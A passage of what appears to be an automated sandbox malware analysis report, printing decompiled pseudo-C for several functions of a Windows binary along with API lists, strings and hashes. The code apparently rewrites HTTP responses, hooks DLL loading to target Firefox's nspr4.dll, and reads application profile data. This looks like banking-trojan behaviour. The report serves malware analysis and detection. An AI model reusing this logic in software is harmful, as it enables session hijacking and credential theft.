						_v36 = _t176;
						if(_t168 > 0) {
							E004119FD( *((intOrPtr*)(_t176 + 0x14)) +  *((intOrPtr*)(_t176 + 0x18)), _a8, _t168);
							 *((intOrPtr*)(_t176 + 0x18)) =  *((intOrPtr*)(_t176 + 0x18)) + _t168;
						}
						_t110 = E0040780A(_t156,  &_v20,  *((intOrPtr*)(_t176 + 0x14)),  *((intOrPtr*)(_t176 + 0x18)));
						_v52 = _t110;
						if(_t110 == 1) {
							_t119 = E004079B4( &_v20,  *((intOrPtr*)(_t176 + 0x18)),  *((intOrPtr*)(_t176 + 0x14)), ( &_v48 & 0xffffff00 | _v52 == 0x00000000) & 0x000000ff,  &_v48,  &_v40);
							_v60 = _t119;
							if(_t119 == 1) {
								if(E00418EB0( *((intOrPtr*)(_t176 + 0x10)),  *((intOrPtr*)(_t176 + 0xc)),  *((intOrPtr*)(_t176 + 4)),  &_v48,  &_v40) != 0) {
									_t155 = _v40;
									_t186 = E00411991( *((intOrPtr*)(_t176 + 0x18)) -  *((intOrPtr*)(_t199 + 0x3c)) +  *((intOrPtr*)(_t199 + 0x38)) + _t155 + 0x14);
									_v40 = _t186;
									if(_t186 != 0) {
										_t131 = E004119FD(_t186,  *((intOrPtr*)(_t176 + 0x14)),  *((intOrPtr*)(_t199 + 0x38)));
										_push(_t155);
										if(( *(_t199 + 0x30) & 0x00000002) == 0) {
											E0041216A(_t199 + 0x28);
											_t188 = E00416964(_t186,  *((intOrPtr*)(_t199 + 0x40)), "Content-Length",  &_v36) + _v60;
											E004119FD(_t188,  *((intOrPtr*)(_t199 + 0x18)), _t155);
											_t189 = _t188 + _t155;
											__eflags = _t189;
										} else {
											_push("%x\r\n");
											_t191 = _t186 + _t131;
											_t177 = 0xd;
											_t192 = _t191 + E004126F8(_t131, _t177, _t191);
											E004119FD(_t192, _v48, _t155);
											_t193 = _t192 + _t155;
											E004119FD(_t193, "\r\n0\r\n\r\n", 7);
											_t176 = _v60;
											_t189 = _t193 + 7;
										}
										_t137 =  *((intOrPtr*)(_t176 + 0x18));
										if( *((intOrPtr*)(_t199 + 0x3c)) !=  *((intOrPtr*)(_t176 + 0x18))) {
											_t189 = _t189 + E004119FD(_t189,  *((intOrPtr*)(_t176 + 0x14)) +  *((intOrPtr*)(_t199 + 0x3c)), _t137 -  *((intOrPtr*)(_t199 + 0x3c)));
										}
										E004119C1( *((intOrPtr*)(_t176 + 0x14)));
										_t139 = _v44;
										 *((intOrPtr*)(_t176 + 0x14)) = _t139;
										 *((intOrPtr*)(_t176 + 0x18)) = _t189 - _t139;
									}
								}
								_v44 = _v44 | 0xffffffff;
								E004119C1(_v48);
							}
							_t153 = 0x422a08;
						}
						if(_v52 <= 0) {
							L29:
							if(__eflags == 0) {
								L31:
								 *((intOrPtr*)(_t176 + 0x2c)) =  *((intOrPtr*)(_t176 + 0x14));
								 *((intOrPtr*)(_t176 + 0x30)) =  *((intOrPtr*)(_t176 + 0x18));
								 *((intOrPtr*)(_t176 + 0x34)) = 0;
								 *((intOrPtr*)(_t176 + 0x14)) = 0;
								 *((intOrPtr*)(_t176 + 0x18)) = 0;
								E004193CE( *((intOrPtr*)(_t176 + 0x10)),  *((intOrPtr*)(_t176 + 0xc)));
								_t103 = _v40;
								 *((intOrPtr*)(_t176 + 0x10)) = 0;
								 *((intOrPtr*)(_t176 + 0xc)) = 0;
								goto L32;
							}
							__eflags = _v44 - 0xffffffff;
							if(_v44 != 0xffffffff) {
								goto L37;
							}
							goto L31;
						} else {
							if(_v44 != 0) {
								__eflags = _v52;
								goto L29;
							}
							_push(0);
							_push(0xffffe892);
							goto L36;
						}
					}
					_t149 = _t108 * 0x38 +  *0x422a24;
					_t156 =  *((intOrPtr*)(_t149 + 0x18)) + _t168;
					_t11 = _t149 + 0x14; // -4336144
					if(E0041194C( *((intOrPtr*)(_t149 + 0x18)) + _t168, _t11) == 0) {
						goto L35;
					}
					_t168 = _v52;
					goto L11;
				}
			}

0x00407bec
0x00407bf2
0x00407bf7
0x00407bfc
0x00407ee9
0x00407ef0
0x00000000
0x00407c16
0x00407c1c
0x00407c22
0x00407c24
0x00407c2c
0x00407ee2
0x00407ee3
0x00000000
0x00407ee3
0x00407c35
0x00407c3f
0x00407e7b
0x00407e7e
0x00407e81
0x00407e81
0x00407e84
0x00407e89
0x00407e95
0x00407e9a
0x00407ea0
0x00407ea3
0x00407eb1
0x00407eb1
0x00407eb7
0x00407ebd
0x00407ef9
0x00407eff
0x00407eff
0x00407c49
0x00000000
0x00000000
0x00407c50
0x00407c5d
0x00407c63
0x00407c66
0x00407c6d
0x00407edc
0x00407edc
0x00000000
0x00407edc
0x00407c74
0x00407c76
0x00407c7b
0x00407c80
0x00407ec1
0x00407ec1
0x00407ec3
0x00407ec8
0x00407ec8
0x00407ece
0x00407ed5
0x00407ed6
0x00000000
0x00407ed6
0x00407c86
0x00407c8c
0x00407cb0
0x00407cb3
0x00407cb9
0x00407cbf
0x00407ccc
0x00407cd1
0x00407cd1
0x00407cde
0x00407ce3
0x00407cea
0x00407d0e
0x00407d13
0x00407d1a
0x00407d3a
0x00407d47
0x00407d58
0x00407d5a
0x00407d60
0x00407d6f
0x00407d79
0x00407d7a
0x00407db6
0x00407dd6
0x00407ddb
0x00407de0
0x00407de0
0x00407d7c
0x00407d7c
0x00407d83
0x00407d85
0x00407d92
0x00407d95
0x00407da1
0x00407da4
0x00407da9
0x00407dad
0x00407dad
0x00407de2
0x00407de9
0x00407dfe
0x00407dfe
0x00407e03
0x00407e08
0x00407e0e
0x00407e11
0x00407e11
0x00407d60
0x00407e18
0x00407e1d
0x00407e1d
0x00407e22
0x00407e22
0x00407e2d
0x00407e44
0x00407e44
0x00407e51
0x00407e57
0x00407e5d
0x00407e63
0x00407e66
0x00407e69
0x00407e6c
0x00407e71
0x00407e75
0x00407e78
0x00000000
0x00407e78
0x00407e46
0x00407e4b
0x00000000
0x00000000
0x00000000
0x00407e2f
0x00407e33
0x00407e40
0x00000000
0x00407e40
0x00407e35
0x00407e36
0x00000000
0x00407e36
0x00407e2d
0x00407c91
0x00407c9a
0x00407c9c
0x00407ca6
0x00000000
0x00000000
0x00407cac
0x00000000
0x00407cac

APIs

Part of subcall function 00406473: WaitForSingleObject.KERNEL32(00000000,0041D5FF,743C152E,00000002), ref: 0040647B

EnterCriticalSection.KERNEL32(00422A08), ref: 00407C22
LeaveCriticalSection.KERNEL32(00422A08), ref: 00407C50
EnterCriticalSection.KERNEL32(00422A08), ref: 00407C74
LeaveCriticalSection.KERNEL32(00422A08,00000000,?,00000000), ref: 00407EB7
LeaveCriticalSection.KERNEL32(00422A08), ref: 00407ED6

Part of subcall function 00416964: StrCmpNIA.SHLWAPI(00000000,?,?,00000000,?,-00422A24,?,00000000), ref: 004169BE

Part of subcall function 004119C1: HeapFree.KERNEL32(00000000,00000000,004131B8,00000000,?,?,?,00405C4E,00000000,00406128), ref: 004119D4

LeaveCriticalSection.KERNEL32(00422A08), ref: 00407EE3

Strings

Content-Length, xrefs: 00407DC0
0, xrefs: 00407D9C
%x, xrefs: 00407D7C

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$Leave$Enter$FreeHeapObjectSingleWait
String ID: 0$%x$Content-Length
API String ID: 4067213518-3838797520
Opcode ID: f7e785ec01a1d6f42ab388d4bcd7facbee8f2370bc7451efdb8c0b5d687c4975
Instruction ID: cc7eb924c955322c19461def26c27e90ded5ea2cf8bd9a966f7f72c156a4bdec
Opcode Fuzzy Hash: f7e785ec01a1d6f42ab388d4bcd7facbee8f2370bc7451efdb8c0b5d687c4975
Instruction Fuzzy Hash: 4491C372904216AFC711DF25C941A5A7BF8FF44314F004A6AF960A36A1C738FD95CBDA

Uniqueness

Uniqueness Score: -1.00%

Function 00418EB0, Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 367
timenetworkCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00418EB0(char __eax, void* __ecx, char* _a4, intOrPtr* _a8, signed int* _a12) {
				char _v540;
				char _v800;
				char _v804;
				char _v860;
				struct _SYSTEMTIME _v876;
				char _v900;
				signed int _v968;
				signed int _v980;
				intOrPtr _v984;
				intOrPtr _v988;
				char* _v992;
				char _v996;
				void* _v1008;
				struct _SYSTEMTIME _v1028;
				signed int _v1032;
				short _v1036;
				signed short* _v1040;
				signed int _v1044;
				intOrPtr* _v1048;
				signed int _v1052;
				signed int _v1056;
				signed int _v1060;
				signed int _v1064;
				char _v1068;
				intOrPtr _v1072;
				char _v1076;
				intOrPtr _v1080;
				intOrPtr _v1084;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t158;
				signed int _t159;
				intOrPtr _t160;
				signed int _t168;
				void* _t188;
				void* _t199;
				signed int _t211;
				signed int _t215;
				signed int _t218;
				signed char _t222;
				signed int _t224;
				void* _t227;
				void* _t228;
				signed int _t229;
				signed int _t230;
				signed int _t240;
				void* _t242;
				signed int _t250;
				intOrPtr* _t254;
				signed int _t255;
				intOrPtr _t258;
				short* _t261;
				void* _t280;
				intOrPtr* _t286;
				signed int _t291;
				long _t294;
				signed short* _t296;
				signed short* _t298;
				signed int _t301;
				intOrPtr* _t303;
				signed int _t307;
				void* _t309;

				_t309 = (_t307 & 0xfffffff8) - 0x424;
				_v1032 = _v1032 & 0x00000000;
				if(__eax == 0) {
					L52:
					asm("sbb eax, eax");
					return  ~0x00000000;
				} else {
					_t286 = __ecx + 0x10;
					_v1048 = _t286;
					_v1028.wDayOfWeek = __eax;
					do {
						_t258 =  *_t286;
						_t279 =  *(_t286 - 0x10) >> 0x0000000a & 0x00000008;
						_v1028.wHour = _t279;
						if(_t258 == 0) {
							_t254 = _a8;
							L6:
							_t259 =  *(_t286 + 4);
							_v1052 = _v1052 & 0x00000000;
							_v1064 = _v1064 & 0x00000000;
							_t158 =  *((intOrPtr*)(_t286 + 8)) + _t259;
							_v1028.wSecond = _t158;
							if(_t259 >= _t158) {
								L35:
								_t159 =  *(_t286 - 0x10);
								_t294 = 0;
								if((_t159 & 0x00000008) != 0 && _v1052 != 0) {
									if((_t159 & 0x00000200) == 0) {
										_t255 = E00411C01(_t159 | 0xffffffff, 0, _a4);
										__eflags = _t255;
										if(_t255 != 0) {
											_t188 = 9;
											E00419DD3(_t188,  &_v996);
											_push(_v1052);
											E0040BA61(_t259, _t279, __eflags, 0xc9, _t255, 0,  &_v996, _t255);
											_t309 = _t309 + 0x18;
											E004119C1(_t255);
										}
									} else {
										_t280 = 0x3c;
										E00411A74( &_v996,  &_v996, 0, _t280);
										_v992 =  &_v800;
										_v1008 = _t280;
										_v988 = 0x103;
										if(InternetCrackUrlA(_a4, 0, 0,  &_v1008) == 1 && _v992 > 0) {
											GetSystemTime( &_v1028);
											_t306 =  &_v876;
											_t199 = 8;
											E00419DD3(_t199,  &_v876);
											_push(_v1028.wDay & 0x0000ffff);
											_push(_v1028.wMonth & 0x0000ffff);
											_push((_v1028.wYear & 0x0000ffff) - 0x7d0);
											_push( &_v804);
											E004126B4( &_v876, 0x104,  &_v540, _t306);
											_t309 = _t309 + 0x14;
											E0040B8B7(_t259, 0x104, 2, 0,  &_v540, _v1068, _v1080);
											_t286 = _v1084;
										}
									}
									E004119C1(_v1052);
									_t294 = 0;
								}
								if( *((intOrPtr*)(_t286 - 4)) != _t294) {
									if(( *(_t286 - 0x10) & 0x00000010) == 0) {
										EnterCriticalSection(0x423c6c);
										E004119C1( *0x423c84);
										_t168 = E00411E1F(E004119C1( *0x423c88) | 0xffffffff,  *((intOrPtr*)(_t286 - 0xc)));
										 *0x423c84 = _t168;
										__eflags = _t168 | 0xffffffff;
										 *0x423c88 = E00411E1F(_t168 | 0xffffffff,  *((intOrPtr*)(_t286 - 4)));
										LeaveCriticalSection(0x423c6c);
										goto L51;
									}
									E004066FC( &_v860, _t259, 1,  &_v996);
									if(E00412C66( &_v900,  *((intOrPtr*)(_t286 - 4)), E004124FE( *((intOrPtr*)(_t286 - 4)))) == 0) {
										goto L51;
									}
									_t261 =  &_v860;
									do {
										E00411D29( *((intOrPtr*)(_t309 + _t294 + 0xb8)), _t261);
										_t294 = _t294 + 1;
										_t261 = _t261 + 4;
									} while (_t294 < 0x10);
									 *_t261 = 0;
									GetLocalTime( &_v876);
									E00415C40(_t261,  &_v996,  &_v860, 3,  &_v876, 0x10);
								}
								goto L51;
							} else {
								goto L9;
								L13:
								_t279 =  *_t211 & 0x0000ffff;
								if(_t279 != 4) {
									_t259 = _t211 + 4;
									_t218 = E004181D6(_v1028.wHour, _t211 + 4, 0,  &_v1056, _t279 - 4,  *_t254 + _v1060,  *_a12 - _v1060);
									__eflags = _t218;
									if(_t218 == 0) {
										L33:
										if(_v1028.wYear < _v1028.wSecond) {
											_t259 = _v1028.wYear;
											L9:
											_t211 = ( *_t259 & 0x0000ffff) + _t259;
											_t296 = ( *_t211 & 0x0000ffff) + _t211;
											_v1028.wYear = _t296 + ( *_t296 & 0x0000ffff);
											_t279 =  *_t259 & 0x0000ffff;
											_v1036 = _t259;
											_v1044 = _t211;
											_v1040 = _t296;
											if(( *_t259 & 0x0000ffff) != 4) {
												goto L11;
											} else {
												_v1060 = _v1060 & 0x00000000;
												goto L13;
											}
										}
										_t286 = _v1048;
										goto L35;
									}
									__eflags =  *_v1036 - 4;
									_t298 = _v1040;
									if( *_v1036 != 4) {
										_t54 =  &_v1056;
										 *_t54 = _v1056 + _v1060;
										__eflags =  *_t54;
									} else {
										_v1060 = _v1056;
									}
									L22:
									_t259 = _v1056 - _v1060;
									_t222 =  *(_v1048 - 0x10);
									_t291 = ( *_t298 & 0x0000ffff) - 4;
									_v1044 = _t259;
									if((_t222 & 0x00000004) == 0) {
										__eflags = _t222 & 0x00000008;
										if((_t222 & 0x00000008) != 0) {
											_t224 = E0041194C(_t259 + _t291 + _v1064 + 2,  &_v1052);
											__eflags = _t224;
											if(_t224 != 0) {
												_t301 = _v1052;
												__eflags = _t291;
												if(_t291 != 0) {
													E004119FD(_v1064 + _t301,  &(_v1040[2]), _t291);
													_t84 =  &_v1076;
													 *_t84 = _v1076 + _t291;
													__eflags =  *_t84;
												}
												_t279 = _v1044;
												_t227 = E004119FD(_v1064 + _t301,  *_t254 + _v1060, _t279);
												_t259 = _v1060;
												__eflags =  *(_t259 - 0x10) & 0x00000100;
												if(( *(_t259 - 0x10) & 0x00000100) == 0) {
													_t228 = E004165E7(_t227, _t279);
													_t95 =  &_v1068;
													 *_t95 = _v1068 + _t228;
													__eflags =  *_t95;
													_t254 = _a8;
												} else {
													_v1064 = _v1064 + _t279;
												}
												_t229 = _v1064;
												 *((char*)(_t229 + _t301)) = 0xa;
												_t230 = _t229 + 1;
												__eflags = _t230;
												_v1064 = _t230;
												 *((char*)(_t230 + _t301)) = 0;
											}
										}
									} else {
										_v1036 =  *_a12 - _t259 + _t291;
										_t240 = E00411991( *_a12 - _t259 + _t291);
										_v1044 = _t240;
										if(_t240 != 0) {
											_t279 = _v1060;
											_t242 = E004119FD(E004119FD(_t240,  *_t254, _v1060) + _v1060,  &(_t298[2]), _t291);
											_t303 = _a12;
											_t259 =  *_t254 + _v1080;
											E004119FD(_t242 + _t291 + _v1060,  *_t254 + _v1080,  *_t303 - _v1080);
											E004119C1( *_t254);
											_v1072 = _v1072 + 1;
											 *_t254 = _v1084;
											 *_t303 = _v1076;
										}
									}
									goto L33;
								}
								if( *_t259 != _t279) {
									_t250 = _v1060;
								} else {
									_t250 =  *_a12;
								}
								_v1056 = _t250;
								goto L22;
								L11:
								_t215 = E004181D6(_v1028.wHour, _t259,  &_v1060, 0, _t279 - 4,  *_t254,  *_a12);
								__eflags = _t215;
								if(_t215 == 0) {
									goto L33;
								}
								_t298 = _v1040;
								_t211 = _v1044;
								_t259 = _v1036;
								goto L13;
							}
						}
						_v996 = 0x2a3f;
						_v992 = _t258;
						_t160 = E004124FE(_t258);
						_t254 = _a8;
						_v988 = _t160;
						_v984 =  *_t254;
						_t279 = _t279 | 0x00000012;
						_v980 =  *_a12;
						_v968 = _t279;
						if(L00412945( &_v996) != 0) {
							goto L6;
						}
						L51:
						_t286 = _t286 + 0x1c;
						_t150 =  &(_v1028.wDayOfWeek);
						 *_t150 = _v1028.wDayOfWeek - 1;
						_v1048 = _t286;
					} while ( *_t150 != 0);
					goto L52;
				}
			}

0x00418eb6
0x00418ebc
0x00418ec6
0x00419351
0x00419358
0x00419361
0x00418ecc
0x00418ecc
0x00418ecf
0x00418ed3
0x00418ed7
0x00418eda
0x00418edf
0x00418ee2
0x00418ee8
0x00418f2a
0x00418f2d
0x00418f2d
0x00418f33
0x00418f38
0x00418f3d
0x00418f3f
0x00418f45
0x00419147
0x00419147
0x0041914a
0x0041914e
0x00419163
0x00419228
0x0041922a
0x0041922c
0x00419234
0x00419235
0x0041923a
0x0041924a
0x0041924f
0x00419253
0x00419253
0x00419169
0x0041916b
0x00419173
0x0041917f
0x0041918d
0x00419191
0x004191a2
0x004191b7
0x004191bf
0x004191c6
0x004191c7
0x004191d1
0x004191d7
0x004191e2
0x004191ea
0x004191fa
0x004191ff
0x00419211
0x00419216
0x00419216
0x004191a2
0x0041925c
0x00419261
0x00419261
0x00419266
0x00419270
0x004192fd
0x00419309
0x0041931f
0x00419324
0x0041932c
0x00419335
0x0041933a
0x00000000
0x0041933a
0x00419284
0x004192a2
0x00000000
0x00000000
0x004192a8
0x004192af
0x004192b6
0x004192bb
0x004192bc
0x004192bf
0x004192c6
0x004192d1
0x004192f0
0x004192f0
0x00000000
0x00418f4b
0x00418f4b
0x00418fb0
0x00418fb0
0x00418fb6
0x00418fe9
0x00418ff0
0x00418ff5
0x00418ff7
0x00419135
0x0041913d
0x00418f4d
0x00418f51
0x00418f54
0x00418f59
0x00418f60
0x00418f64
0x00418f67
0x00418f6b
0x00418f6f
0x00418f76
0x00000000
0x00418f78
0x00418f78
0x00000000
0x00418f78
0x00418f76
0x00419143
0x00000000
0x00419143
0x00419001
0x00419005
0x00419009
0x00419019
0x00419019
0x00419019
0x0041900b
0x0041900f
0x0041900f
0x0041901d
0x00419028
0x0041902c
0x0041902f
0x00419032
0x00419038
0x004190aa
0x004190ac
0x004190c0
0x004190c5
0x004190c7
0x004190c9
0x004190cd
0x004190cf
0x004190e1
0x004190e6
0x004190e6
0x004190e6
0x004190e6
0x004190ec
0x004190fd
0x00419102
0x00419106
0x0041910d
0x00419118
0x0041911d
0x0041911d
0x0041911d
0x00419121
0x0041910f
0x0041910f
0x0041910f
0x00419124
0x00419128
0x0041912c
0x0041912c
0x0041912d
0x00419131
0x00419131
0x004190c7
0x0041903a
0x00419043
0x00419047
0x0041904c
0x00419052
0x00419058
0x0041906e
0x00419073
0x00419081
0x00419089
0x00419090
0x00419099
0x0041909d
0x004190a3
0x004190a3
0x00419052
0x00000000
0x00419038
0x00418fbb
0x00418fc4
0x00418fbd
0x00418fc0
0x00418fc0
0x00418fc8
0x00000000
0x00418f7f
0x00418f97
0x00418f9c
0x00418f9e
0x00000000
0x00000000
0x00418fa4
0x00418fa8
0x00418fac
0x00000000
0x00418fac
0x00418f45
0x00418eea
0x00418ef1
0x00418ef5
0x00418efa
0x00418efd
0x00418f03
0x00418f0c
0x00418f13
0x00418f17
0x00418f22
0x00000000
0x00418f28
0x00419340
0x00419340
0x00419343
0x00419343
0x00419347
0x00419347
0x00000000
0x00418ed7

APIs

InternetCrackUrlA.WININET(?,00000000,00000000,?), ref: 00419199
GetSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?), ref: 004191B7
GetLocalTime.KERNEL32(?,?,?,00000000,00000001,?,-00422A24,?,?), ref: 004192D1
EnterCriticalSection.KERNEL32(00423C6C,-00422A24,?,?), ref: 004192FD
LeaveCriticalSection.KERNEL32(00423C6C,?,?), ref: 0041933A

Strings

?*, xrefs: 00418EEA
l<B, xrefs: 004192F7

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSectionTime$CrackEnterInternetLeaveLocalSystem
String ID: ?*$l<B
API String ID: 2400141425-1243836432
Opcode ID: 74736927db7a9a416c48966e6369d7d0e32b58c176d9fdabb4c9c6b215d8561a
Instruction ID: 58aa7167879ca7d14ca9f590827a5d99002fdd2f6c048420020af8b4d6d7d32f
Opcode Fuzzy Hash: 74736927db7a9a416c48966e6369d7d0e32b58c176d9fdabb4c9c6b215d8561a
Instruction Fuzzy Hash: EDE1CCB1608341AFD710DF68C884AAFB7E5FF88304F004A1EF994A7251D738E985CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 0040E211, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 156
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E0040E211(char* __ecx, char* __edx, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				char* _v20;
				char _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v64;
				char _v84;
				char _v108;
				char _v152;
				char _v180;
				char _v252;
				short _v766;
				char _v772;
				short _v1292;
				void* __edi;
				void* __esi;
				void* _t46;
				void* _t48;
				void* _t53;
				void* _t57;
				void* _t59;
				void* _t61;
				void* _t68;
				void* _t70;
				void* _t75;
				WCHAR* _t100;
				signed int _t101;
				WCHAR* _t103;
				char* _t108;
				intOrPtr _t109;
				void* _t112;
				intOrPtr _t125;

				_t99 = __edx;
				_t98 = __ecx;
				E00411A74( &_v12,  &_v12, 0, 8);
				_t46 = 0x6a;
				E00419DD3(_t46,  &_v252);
				_t48 = 0x6b;
				E00419DD3(_t48,  &_v108);
				_t100 =  &_v772;
				_t53 = E00415AE5(0x80000001, _t98, _t100,  &_v252,  &_v108, 0x104);
				if(_t53 != 0xffffffff) {
					_t115 = _t53;
					if(_t53 != 0) {
						ExpandEnvironmentStringsW(_t100,  &_v1292, 0x104);
						E0040E025(_t99, _t115,  &_v1292,  &_v12);
						PathRemoveFileSpecW( &_v1292);
					}
				}
				_t101 = 0;
				if(_v8 != 0) {
					L14:
					_t125 = _v8;
					goto L15;
				} else {
					_t57 = 0x6d;
					E00419DD3(_t57,  &_v64);
					_t59 = 0x6e;
					E00419DD3(_t59,  &_v152);
					_t108 =  &_v84;
					_t61 = 0x6f;
					E00419DD3(_t61, _t108);
					_v24 =  &_v64;
					_v20 =  &_v152;
					_v40 = 0x24;
					_v36 = 0x1a;
					_v32 = 0x26;
					_v28 = 0x23;
					_v16 = _t108;
					do {
						_t109 =  *((intOrPtr*)(_t112 + _t101 * 4 - 0x24));
						__imp__SHGetFolderPathW(0, _t109, 0, 0,  &_v772);
						if(0 == 0) {
							_t118 = _t109 - 0x24;
							if(_t109 == 0x24) {
								E0040DFE3(_t118,  &_v772,  &_v12, 0);
								_v766 = 0;
							}
							_t99 =  &_v24;
							_t98 =  &_v772;
							E004170EA( &_v772,  &_v24, 0, 3, 2, E0040E1C8,  &_v12, 0, 0, 0);
						}
						_t101 = _t101 + 1;
					} while (_t101 < 4);
					if(_v8 != 0) {
						L15:
						if(_t125 <= 0) {
							return E004119C1(_v12);
						}
						_push(0xcb);
						return E0040C9F4(_t99, _v12, 0x70);
					}
					_t68 = 0x6a;
					E00419DD3(_t68,  &_v180);
					_t70 = 0x6c;
					E00419DD3(_t70,  &_v64);
					_t103 =  &_v772;
					_t75 = E00415AE5(0x80000001, _t98, _t103,  &_v180,  &_v64, 0x104);
					if(_t75 != 0xffffffff) {
						_t124 = _t75;
						if(_t75 != 0) {
							ExpandEnvironmentStringsW(_t103,  &_v1292, 0x104);
							E0040DFE3(_t124,  &_v1292,  &_v12, 1);
						}
					}
					goto L14;
				}
			}

0x0040e211
0x0040e211
0x0040e225
0x0040e232
0x0040e233
0x0040e23d
0x0040e23e
0x0040e253
0x0040e25e
0x0040e266
0x0040e268
0x0040e26a
0x0040e277
0x0040e288
0x0040e294
0x0040e294
0x0040e26a
0x0040e29a
0x0040e29f
0x0040e3bf
0x0040e3bf
0x00000000
0x0040e2a5
0x0040e2aa
0x0040e2ab
0x0040e2b8
0x0040e2b9
0x0040e2c0
0x0040e2c3
0x0040e2c4
0x0040e2cc
0x0040e2d5
0x0040e2da
0x0040e2e1
0x0040e2e8
0x0040e2ef
0x0040e2f6
0x0040e2f9
0x0040e2f9
0x0040e30a
0x0040e312
0x0040e314
0x0040e317
0x0040e325
0x0040e32c
0x0040e32c
0x0040e345
0x0040e348
0x0040e34e
0x0040e34e
0x0040e353
0x0040e354
0x0040e35d
0x0040e3c3
0x0040e3c3
0x00000000
0x0040e3da
0x0040e3c8
0x00000000
0x0040e3d0
0x0040e367
0x0040e368
0x0040e372
0x0040e373
0x0040e383
0x0040e38e
0x0040e396
0x0040e398
0x0040e39a
0x0040e3a7
0x0040e3ba
0x0040e3ba
0x0040e39a
0x00000000
0x0040e396

APIs

Part of subcall function 00415AE5: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,0041D971,?,?,00000104,.exe,00000000), ref: 00415AFA

ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000104,?,00000000,00000008,?,00000000,00000001), ref: 0040E277

Part of subcall function 0040E025: GetPrivateProfileStringW.KERNEL32 ref: 0040E05C
Part of subcall function 0040E025: StrStrIW.SHLWAPI(00000001,?), ref: 0040E0E4
Part of subcall function 0040E025: StrStrIW.SHLWAPI(00000001,?), ref: 0040E0F5
Part of subcall function 0040E025: GetPrivateProfileStringW.KERNEL32 ref: 0040E111
Part of subcall function 0040E025: GetPrivateProfileStringW.KERNEL32 ref: 0040E12F

PathRemoveFileSpecW.SHLWAPI(?,?,?,?,00000000,00000001), ref: 0040E294

Part of subcall function 004119C1: HeapFree.KERNEL32(00000000,00000000,004131B8,00000000,?,?,?,00405C4E,00000000,00406128), ref: 004119D4

SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?,?,?,00000104,?,00000000,00000008,?,00000000,00000001), ref: 0040E30A
ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000104,?,00000000,00000001), ref: 0040E3A7

Strings

#, xrefs: 0040E2EF
$, xrefs: 0040E2DA
&, xrefs: 0040E2E8

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: PrivateProfileString$EnvironmentExpandPathStrings$FileFolderFreeHeapOpenRemoveSpec
String ID: #$$$&
API String ID: 1517737059-1941049543
Opcode ID: dbd064f30b6f99999cc4b5c6e2ebda507a4716bb6c2ad12b636811db818507c2
Instruction ID: 22a198168216e56bb7533f1b087ddf98a97081743fc3489ce413d4f581b21433
Opcode Fuzzy Hash: dbd064f30b6f99999cc4b5c6e2ebda507a4716bb6c2ad12b636811db818507c2
Instruction Fuzzy Hash: E0512972E00218AADF10DBA1DC59FEFB7BCAB08314F0009A7B605F7191DB789A858B55

Uniqueness

Uniqueness Score: -1.00%

Function 00408EE1, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 61
librarystringloaderCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00408EE1(WCHAR* _a4, long _a8, UNICODE_STRING* _a12, HMODULE* _a16) {
				void* __edi;
				void* _t12;
				long _t13;
				void* _t16;
				void* _t17;
				void* _t21;
				void* _t22;
				void* _t23;
				UNICODE_STRING* _t24;
				void* _t28;
				HMODULE* _t29;
				struct _OBJDIR_INFORMATION _t31;

				if(E00406473() != 0) {
					_t29 = _a16;
					_t24 = _a12;
					_t12 =  *0x422564(_a4, 0, _t24, _t29, _t23, _t28, _t17);
					_t13 = LdrLoadDll(_a4, _a8, _t24, _t29);
					_a4 = _t13;
					if(_t12 < 0 && _t13 >= 0 && _t29 != 0 &&  *_t29 != 0 && _t24 != 0) {
						EnterCriticalSection(0x422a30);
						if(( *0x422a48 & 0x00000001) == 0) {
							_t31 =  *_t29;
							if(lstrcmpiW( *(_t24 + 4), L"nspr4.dll") != 0) {
								_t16 = 0;
							} else {
								_t16 = E00419A5A(_t21, _t22, _t31);
							}
							if(_t16 != 0) {
								 *0x422a48 =  *0x422a48 | 0x00000001;
							}
						}
						LeaveCriticalSection(0x422a30);
					}
					return _a4;
				}
				goto ( *0x422560);
			}

0x00408eeb
0x00408ef6
0x00408efa
0x00408f04
0x00408f14
0x00408f1a
0x00408f1f
0x00408f38
0x00408f45
0x00408f4a
0x00408f5a
0x00408f65
0x00408f5c
0x00408f5e
0x00408f5e
0x00408f69
0x00408f6b
0x00408f6b
0x00408f69
0x00408f73
0x00408f73
0x00408f80
0x00408f80
0x00408eee

APIs

Part of subcall function 00406473: WaitForSingleObject.KERNEL32(00000000,0041D5FF,743C152E,00000002), ref: 0040647B

LdrGetDllHandle.NTDLL(?,00000000,?,?), ref: 00408F04
LdrLoadDll.NTDLL(?,?,?,?), ref: 00408F14
